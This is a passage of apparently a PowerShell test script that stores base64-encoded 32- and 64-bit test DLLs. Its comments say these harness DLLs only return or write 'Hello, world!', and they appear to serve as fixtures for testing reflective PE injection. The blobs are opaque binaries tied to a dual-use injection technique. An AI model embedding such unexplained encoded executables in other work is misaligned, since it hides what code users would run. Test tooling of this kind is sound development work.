'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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAACCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='\n\t$Encoded32BitWStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAADAAAABEwAAAAIAAADAAAABwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='\n\n\t# A bare bones test harness DLL that simply returns \"Hello, world!\" upon having StringFunc called\n\t$Encoded64BitStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAABCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='\n\t$Encoded32BitStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAADAAAABEwAAAAIAAADAAAABAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='\n\n\t# A bare bones test harness DLL that simply writes \"Hello, world!\" to %TEMP%\\testoutput.txt upon having VoidFunc called\n\t$Encoded64BitVoidDll = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABxqgfBNctpkjXLaZI1y2mSPLP6kjbLaZI1y2iSM8tpkheyjZI0y2mSF7K1kjTLaZIXsreSNMtpklJpY2g1y2mSAAAAAAAAAABQRQAAZIYDAKZ8PlYAAAAAAAAAAPAAIiALAgwAAAIAAAAEAAAAAAAAABAAAAAQAAAAAACAAQAAAAAQAAAAAgAABQACAAAAAAAFAAIAAAAAAABAAAAABAAAlVEAAAEAYAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAkCAAAF0AAADwIAAAKAAAAAAAAAAAAAAAADAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAACUBAAAAEAAAAAIAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAADIAQAAACAAAAACAAAABgAAAAAAAAAAAAAAAAAAQAAAQC5wZGF0YQAADAAAAAAwAAAAAgAAAAgAAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA